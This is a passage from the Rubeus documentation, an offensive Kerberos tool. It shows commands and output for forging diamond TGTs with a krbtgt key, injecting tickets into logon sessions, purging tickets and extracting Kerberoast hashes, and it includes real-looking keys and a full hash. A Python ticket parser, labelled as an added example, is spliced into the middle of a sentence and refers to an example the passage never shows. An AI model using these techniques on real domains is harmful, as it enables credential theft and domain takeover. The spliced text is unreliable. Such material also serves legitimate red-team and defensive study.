: aes256_cts_hmac_sha1\r\n Base64(key) : 
lQGdcWT5/cacHGFko3fDJvF9poFK+tH5hctlDN89peY=\r\nC:\\Rubeus\u003edir \\\\pdc1.rubeus.ghostpack.local\\c$\r\n Volume in drive \\\\pdc1.rubeus.ghostpack.local\\c$ has no label.\r\n Volume Serial Number is 3C5F-0EF1\r\n Directory of \\\\pdc1.rubeus.ghostpack.local\\c$\r\n30/06/2021 02:13 \u003cDIR\u003e inetpub\r\n15/09/2018 08:19 \u003cDIR\u003e PerfLogs\r\n09/06/2021 17:45 \u003cDIR\u003e Program Files\r\n09/06/2021 17:45 \u003cDIR\u003e Program Files (x86)\r\n14/07/2021 01:18 \u003cDIR\u003e Rubeus\r\n19/07/2021 20:48 \u003cDIR\u003e temp\r\n30/06/2021 02:14 \u003cDIR\u003e Users\r\n14/07/2021 02:17 \u003cDIR\u003e Windows\r\n 0 File(s) 0 bytes\r\n 8 Dir(s) 94,901,772,288 bytes free\r\ndiamond\r\nThe diamond action will forge a diamond TGT by modifying a TGT requested for a user using the given\r\narguments. First a TGT will be requested for the specified user and encryption key ( /rc4 , /aes128 , /aes256 ,\r\nor /des ). A /password flag can be used instead of a hash; in this case /enctype:X defaults to RC4\r\nfor the exchange, with des|aes128|aes256 as options. Alternatively, PKINIT authentication is supported with the\r\n/certificate:X argument. When the private key within the PFX file is password protected, this password can be\r\npassed with the /password:X argument. Lastly, the /tgtdeleg flag can be passed to request a TGT using the\r\ntgtdeleg trick. The /krbkey:X argument is used to decrypt the ticket, re-sign it after the changes have been made,\r\nand re-encrypt the ticket.\r\nIf no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is\r\ndone for the system's current domain controller. The /ptt flag will \"pass-the-ticket\" and apply the resulting\r\nKerberos credential to the current logon session. The /luid:0xA.. 
flag will apply the ticket to the specified\r\nlogon session ID (elevation needed) instead of the current logon session.\r\nNote that no elevated privileges are needed on the host to request TGTs or apply them to the current logon\r\nsession, just the correct hash for the target user. Another opsec note: only one TGT can be applied at a time to\r\nthe current logon session, so when the /ptt option is used the previous TGT is wiped as the new ticket is\r\napplied. A workaround is to use the /createnetonly:C:\\X.exe parameter (which hides the process by default\r\nunless the /show flag is specified), or to request the ticket and apply it to another logon session with ptt\r\n/luid:0xA.. .\r\nThe /ticketuser:X argument is used to specify the username to be used within the modified ticket,\r\n/ticketuserid:# to specify the user's RID, /groups:RID1,RID2... to specify the groups for the ticket and\r\n/sids:SID1,SID2... to specify the SIDs to be included in the ExtraSIDs field.\r\nCreating a diamond TGT using a username and password:\r\nC:\\Rubeus\u003eRubeus.exe diamond /krbkey:3111b43b220d2f4eb8e68fe7be1179ce69328c9071cba14bef4dbb02b1cfeb9c /user:lok\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.1\r\n[*] Action: Diamond Ticket\r\n[*] Using domain controller: earth-dc.marvel.local (10.1.1.11)\r\n[!] Pre-Authentication required!\r\n[!] 
AES256 Salt: MARVEL.LOCALloki\r\n[*] Using aes256_cts_hmac_sha1 hash: 8A90D4F4E8698E76FA014C97A539C1083EDDCB5A281B1274568758FB999DFCE7\r\n[*] Building AS-REQ (w/ preauth) for: 'marvel.local\\loki'\r\n[*] Using domain controller: 10.1.1.11:88\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFejCCBXagAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n oRgwFhsGa3JidGd0GwxNQVJWRUwuTE9DQUw=\r\n[*] Decrypting TGT\r\n[*] Retreiving PAC\r\n[*] Modifying PAC\r\n[*] Signing PAC\r\n[*] Encrypting Modified TGT\r\n[*] base64(ticket.kirbi):\r\n doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n UlZFTC5MT0NBTA==\r\nCreating a diamond TGT using the tgtdeleg trick:\r\nC:\\Rubeus\u003eRubeus.exe diamond /krbkey:3111b43b220d2f4eb8e68fe7be1179ce69328c9071cba14bef4dbb02b1cfeb9c /tgtdeleg\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.1\r\n[*] Action: Diamond Ticket\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 51 of 100\n\n[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'\r\n[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/Earth-DC.marvel.local'\r\n[+] Kerberos GSS-API initialization success!\r\n[+] Delegation request success! 
AP-REQ delegation ticket is now in GSS-API output.\r\n[*] Found the AP-REQ delegation ticket in the GSS-API output.\r\n[*] Authenticator etype: aes256_cts_hmac_sha1\r\n[*] Extracted the service ticket session key from the ticket cache: imNrWVWRhlB61dUk5EWEdQL7DgqBQ/UckUs9pBvw6JU=\r\n[+] Successfully decrypted the authenticator\r\n[*] base64(ticket.kirbi):\r\n doIFejCCBXagAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n oRgwFhsGa3JidGd0GwxNQVJWRUwuTE9DQUw=\r\n[*] Decrypting TGT\r\n[*] Retreiving PAC\r\n[*] Modifying PAC\r\n[*] Signing PAC\r\n[*] Encrypting Modified TGT\r\n[*] base64(ticket.kirbi):\r\n doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n UlZFTC5MT0NBTA==\r\nTicket Management\r\nBreakdown of the ticket management commands:\r\nCommand Description\r\nptt Apply a ticket to the current (or specified) logon session\r\npurge Purge the current (or specified) logon session of Kerberos tickets\r\ndescribe Describe a ticket base64 blob or .kirbi file\r\nptt\r\nThe ptt action will submit a /ticket:X (TGT or service ticket) for the current logon session through the\r\nLsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (if elevated) to the\r\nlogon session specified by /luid:0xA.. . 
Like other /ticket:X parameters, the value can be a base64 encoding\r\nof a .kirbi file or the path to a .kirbi file on disk.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 52 of 100\n\nC:\\Rubeus\u003eRubeus.exe ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM\r\n Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\nElevated ticket application to another logon session:\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 53 of 100\n\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x474722b\r\nUserName : patsy\r\nDomain : TESTLAB\r\nLogonId : 0x474722b\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1169\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 10:58:53 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : patsy@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:58:53 PM ; 2/11/2019 7:58:53 PM 
; 2/18/2019 2:58:53 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : patsy @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\nC:\\Rubeus\u003eRubeus.exe ptt /luid:0x474722b /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Import Ticket\r\n[*] Target LUID: 0x474722b\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 54 of 100\n\n_____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x474722b\r\nUserName : patsy\r\nDomain : TESTLAB\r\nLogonId : 0x474722b\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1169\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 10:58:53 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : patsy@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM\r\n Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\npurge\r\nThe purge action will purge all Kerberos tickets from the current logon session, or (if elevated) to the logon\r\nsession specified by /luid:0xA.. 
.\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 55 of 100\n\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\n [2] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nC:\\Rubeus\u003eRubeus.exe purge\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nLuid: 0x0\r\n[*] Action: Purge Tickets\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 56 of 100\n\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\nC:\\Rubeus\u003e\r\nElevated purging of 
another logon session:\r\nC:\\Rubeus\u003eRubeus.exe triage /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Triage Kerberos Tickets\r\n[*] Target LUID : 0x474722b\r\n-----------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------\r\n| 0x474722b | dfm.a @ TESTLAB.LOCAL | krbtgt/testlab.local | 2/11/2019 7:55:18 PM |\r\n-----------------------------------------------------------------------------------\r\nC:\\Rubeus\u003eRubeus.exe purge /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 57 of 100\n\nLuid: 0x474722b\r\n[*] Action: Purge Tickets\r\n[*] Target LUID: 0x474722b\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe triage /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Triage Kerberos Tickets\r\n[*] Target LUID : 0x474722b\r\n---------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n---------------------------------------\r\n---------------------------------------\r\ndescribe\r\nThe describe action takes a /ticket:X value (TGT or service ticket), parses it, and describes the values of the\r\nticket. 
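As an added example (not Rubeus code), the following Python inspects the outer ASN.1 envelope of a /ticket:X value in the two forms describe and ptt accept (a base64 blob or a path to a .kirbi file), classifies it by its RFC 4120 APPLICATION tag, and reports whether a pasted blob is complete or has been snipped. It uses only the standard library; the base64 prefix is taken from the silver example above, and the small Ticket sample is constructed for the test.

```python
"""Inspect the outer ASN.1 envelope of a /ticket:X value (base64 blob or .kirbi path).

Added example, not Rubeus code. A .kirbi file is a DER-encoded KRB-CRED (RFC 4120):
  KRB-CRED ::= [APPLICATION 22] SEQUENCE { pvno [0] INTEGER, msg-type [1] INTEGER, ... }
"""
import base64
import os

# Kerberos APPLICATION tag numbers from RFC 4120 section 5.
APPLICATION_TAGS = {
    1: "Ticket", 10: "AS-REQ", 11: "AS-REP", 12: "TGS-REQ", 13: "TGS-REP",
    14: "AP-REQ", 15: "AP-REP", 22: "KRB-CRED", 30: "KRB-ERROR",
}

# First 80 base64 characters of the forged TGT printed by the silver example above.
# The README snips the rest, so this prefix is deliberately truncated.
README_KIRBI_PREFIX = (
    "doIF0TCCBc2gAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoRwbGkRFVi5SVUJFVVMuR0hPU1RQ"
)

# Constructed sample: a complete [APPLICATION 1] Ticket carrying tkt-vno 5 and
# realm "ABC" only (no sname/enc-part), enough to exercise the non-truncated path.
SAMPLE_TICKET = bytes.fromhex("610e300ca003020105a1051b03414243")


def load_ticket_blob(value):
    """Resolve a /ticket:X value: an existing file path is read from disk,
    otherwise the value is treated as base64 (pasted whitespace and missing
    '=' padding are tolerated). Raw bytes pass through unchanged."""
    if isinstance(value, (bytes, bytearray)):
        return bytes(value)
    if os.path.isfile(value):
        with open(value, "rb") as fh:
            return fh.read()
    cleaned = "".join(value.split())
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def read_tlv(buf, offset):
    """Parse one DER identifier and length at offset. Returns
    (tag_class, constructed, tag_number, content_length, header_length)."""
    if offset + 1 >= len(buf):
        raise ValueError("unexpected end of data at offset %d" % offset)
    first = buf[offset]
    tag_class, constructed, tag_number = first >> 6, bool(first & 0x20), first & 0x1F
    if tag_number == 0x1F:
        raise ValueError("high-tag-number form is never used by Kerberos")
    pos = offset + 1
    length = buf[pos]
    pos += 1
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("indefinite, oversized or cut-off DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag_class, constructed, tag_number, length, pos - offset


def read_explicit_int(buf, offset):
    """Read a [n] EXPLICIT INTEGER (the shape of pvno, msg-type and tkt-vno).
    Returns (value, offset_after_element)."""
    _, _, _, clen, chdr = read_tlv(buf, offset)
    _, _, itag, ilen, ihdr = read_tlv(buf, offset + chdr)
    if itag != 2:
        raise ValueError("expected INTEGER, got universal tag %d" % itag)
    start = offset + chdr + ihdr
    if start + ilen > len(buf):
        raise ValueError("INTEGER runs past end of data")
    return int.from_bytes(buf[start:start + ilen], "big", signed=True), offset + chdr + clen


def inspect_ticket(value):
    """Classify a /ticket:X value by its APPLICATION tag and say whether the blob
    is complete. Works on a snipped prefix as long as the header survived."""
    blob = load_ticket_blob(value)
    cls, constructed, tag, length, hdr = read_tlv(blob, 0)
    if cls != 1 or not constructed:
        raise ValueError("outer element is not a constructed APPLICATION tag")
    info = {
        "type": APPLICATION_TAGS.get(tag, "unknown"),
        "application_tag": tag,
        "declared_length": hdr + length,  # bytes a complete blob would occupy
        "available_bytes": len(blob),
        "truncated": len(blob) < hdr + length,
    }
    scls, _, stag, _, shdr = read_tlv(blob, hdr)
    if scls != 0 or stag != 16:
        raise ValueError("expected SEQUENCE inside the APPLICATION tag")
    pos = hdr + shdr
    if tag == 1:  # Ticket: tkt-vno [0], realm [1], ...
        info["tkt_vno"], _ = read_explicit_int(blob, pos)
    else:  # every KRB message: pvno [0], msg-type [1], ...
        info["pvno"], pos = read_explicit_int(blob, pos)
        info["msg_type"], _ = read_explicit_int(blob, pos)
        # For RFC 4120 messages the msg-type mirrors the APPLICATION tag number.
        info["consistent"] = info["msg_type"] == tag
    return info


if __name__ == "__main__":
    print("README prefix      :", inspect_ticket(README_KIRBI_PREFIX))
    print("constructed Ticket :", inspect_ticket(SAMPLE_TICKET))
```

A truncated result explains the most common describe failure on a pasted ticket: the "...(snip)..." blobs in this README are not decodable, only the full base64 output is.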
Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi\r\nfile on disk.\r\nIf the supplied ticket is a service ticket AND the encryption type is RC4_HMAC, an extracted Kerberoast-compatible hash is output. If the ticket is a service ticket but the encryption key is AES128/AES256, a warning is\r\ndisplayed. If the ticket is a TGT, no hash or warning is displayed.\r\nThe EncTicketPart (encrypted section of the ticket) can be decrypted using the /servicekey:X argument; this\r\nalso verifies the ServerChecksum within the PAC. The /krbkey:X argument can also be used for service\r\ntickets to verify the KDCChecksum and TicketChecksum (if it exists).\r\nBy passing the /serviceuser:X argument (and /servicedomain:X is required), a crackable \"hash\" can be\r\nformed from an AES256-encrypted service ticket.\r\nDisplay information about a TGT:\r\nC:\\Rubeus\u003eRubeus.exe describe /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : krbtgt/testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/11/2019 2:55:18 PM\r\nEndTime : 2/11/2019 7:55:18 PM\r\nRenewTill : 2/18/2019 2:55:18 PM\r\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : e3MxrlTu9jHh9hG43UfiAQ==\r\nDisplay information about a service ticket with an extracted Kerberoast \"hash\":\r\nC:\\Rubeus\u003eRubeus.exe describe /ticket:service_ticket.kirbi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] 
Action: Describe Ticket\r\nUserName : harmj0y\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : asdf/asdfasdf\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/20/2019 8:58:14 AM\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 59 of 100\n\nEndTime : 2/20/2019 12:41:09 PM\r\nRenewTill : 2/27/2019 7:41:09 AM\r\nFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : WqGWK4htp7rM1CURpxjMPA==\r\nKerberoast Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$DEB467BF9C9023E...(snip)...\r\nDisplay information about a TGT along with the decrypted PAC:\r\nC:\\Rubeus\u003eRubeus.exe describe /servicekey:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /tic\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Describe Ticket\r\n ServiceName : krbtgt/rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : exploitph\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 28/07/2021 21:25:45\r\n EndTime : 29/07/2021 07:25:45\r\n RenewTill : 04/08/2021 21:25:45\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : Gcf0pE1AVgbbmtSRqJbf9A==\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 20/07/2021 22:10:22\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 00:50:44\r\n PasswordCanChange : 15/07/2021 00:50:44\r\n PasswordMustChange :\r\n EffectiveName : exploitph\r\n FullName : Exploit PH\r\n LogonScript :\r\n ProfilePath :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 60 of 100\n\nHomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 11\r\n BadPasswordCount : 0\r\n UserId : 1104\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n 
LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (262672) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n ClientName :\r\n Client Id : 28/07/2021 21:25:45\r\n Client Name : exploitph\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : exploitph@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : DC220C13C97C5723456DADE2 (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 32C03715F0B11E3D2EDA3D05 (VALID)\r\nDisplaying information about an AES256 encrypted service ticket with an extracted Kerberoast \"hash\":\r\nC:\\Rubeus\u003eRubeus.exe describe /serviceuser:exploitph /ticket:doIFSjCCB...(snip)...Vyb2FzdBsCbWU=\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Describe Ticket\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 61 of 100\n\nServiceName : roast/me\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 28/07/2021 21:31:57\r\n EndTime : 29/07/2021 07:31:20\r\n RenewTill : 04/08/2021 21:31:20\r\n Flags : name_canonicalize, pre_authent, renewable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : T+hpOdnnvvLhnSwup/O/DmYYY3CXVP4kN/Hq5qWWwKg=\r\n Kerberoast Hash : $krb5tgs$18$exploitph$RUBEUS.GHOSTPACK.LOCAL$*roast/me*$1063B9C2E8BAB76E5051F5DE\r\n $CD5F3403552BD882CBC52389C9851EFD9B7B72174CCA44876DD4E2958FE807B2A899EE33279835D\r\n 01BEF12B6FE65174B4BF7B6A5062F45DDBEDA76CF2B122579194B3F1CF3192F982EFE5109B4FF644\r\n FDE4D4A170551B764A699DC4DB3535AE937E24D8D5EF0C980C98D115A6707A1F2583FAAB76FD4514\r\n 
6957453FAAD213EF28ACED98E72CC909FCC8CB0FD904DE71607BB1C25163EC9512996057CB34950F\r\n 40480CABC5CA812B06E461FF3ECAE62022D7BA3500B506AF9BCD557DB987D565FEC8583E5C093AB5\r\n AF7387930AE3DBC0C4197DB75988D0785E90B1C799C1245CBC891BEC5008BFED99A8042214300440\r\n 4846C3296A721B546428CA71640B2BDD730ADEDBE6217C572288D904E5F64843148EF30BED8F62A7\r\n A038B770DDD787BBBDCCBC4BF63EAC4C18E596F9A1C21B3265C1D402E84547B5491E4FE8E9B05E10\r\n 606773DA47C2570B7B191AE2648C0C467ED242F86C2DC5BD90D5E07D5C3DAACC917E796E5ACB416B\r\n 8D980AC30D300016556AEF064DC6C0822D6EAEF41EC5C376E46BE54AB6B85959BDEDF0D15F87AD07\r\n 14F8999503F6DEEDC5F1798D7F82FB4A068D1C44A761C44589EAF7E17D4C855893A8C71B2FE309EB\r\n 2FE87D36429CF0CA9AA3B02C981F2E6900D0B887EBF1438B3D084963D5AD6B06894A49D3BFED4A19\r\n 5CA0A544A6E73B46E85C0B5E6F7230884E44B265A48CB5EFF3EC699B63DF4C5241FC11F2E74953CF\r\n DD610C9B3137CD15C716E538F42464A37D2B5F719B6FD0D783509B503E68F46F1FE0E03D12B97B79\r\n 6EFB104E093F625894C59BC025273CF0F0B1EF975FF9584AEE227E27304DE545C71B367BEF2EF6DA\r\n 22CFF2940387DEA77446B84AC436C7FD273C04247D67334A8D2F2729DE88287BB270D0F495F8EA50\r\n 126EA94E7417A4191D080A7284FF2736C704A03EF7F7A044A6E357972A7BAC56AD3775C110A10954\r\n 0656CB6759BB61B47B7FF5545A97735279CDB281F632DAD91047FBEC3E98F8B5BC10CA4FFE446186\r\n 67BC174CFE97E2262EE8E4651AB460AB2E9A1B214566969FE30BC9A2EEA2BBC79E1ABDBB5A6E8BB6\r\n 0EF60EB33DCA0F50682DAB8A2F4AE863F83AD928E8D977AA2079706827B78A0CF37FA2D62EAD3A14\r\n 70625022335458E0E84C11786E9A84CAB5A136777B9E8293142D62D96DF9E04AACE6839E13CC54CA\r\n B2B7F5752F8CE9544D7076960CCD7D26C8A0E8E9C879A11A44D2BCC607CE15862E29361C786C095C\r\n 1EA55D7BD277E581E2488BD3FA4B8E09C331A1E7E3C4BE1C745B59E710362F8EEE9578EF9E5FB34F\r\n AAA63C3D7D85000A84A29831B01BD0F4239263FDF59621E57CEE718B29AA2561857C4CD8020AF057\r\n AB5AC097DA90E9B15F6C881F47D95A9F9C15B60EE0B821FDDEB3A9AD4D71E\r\nTicket Extraction and 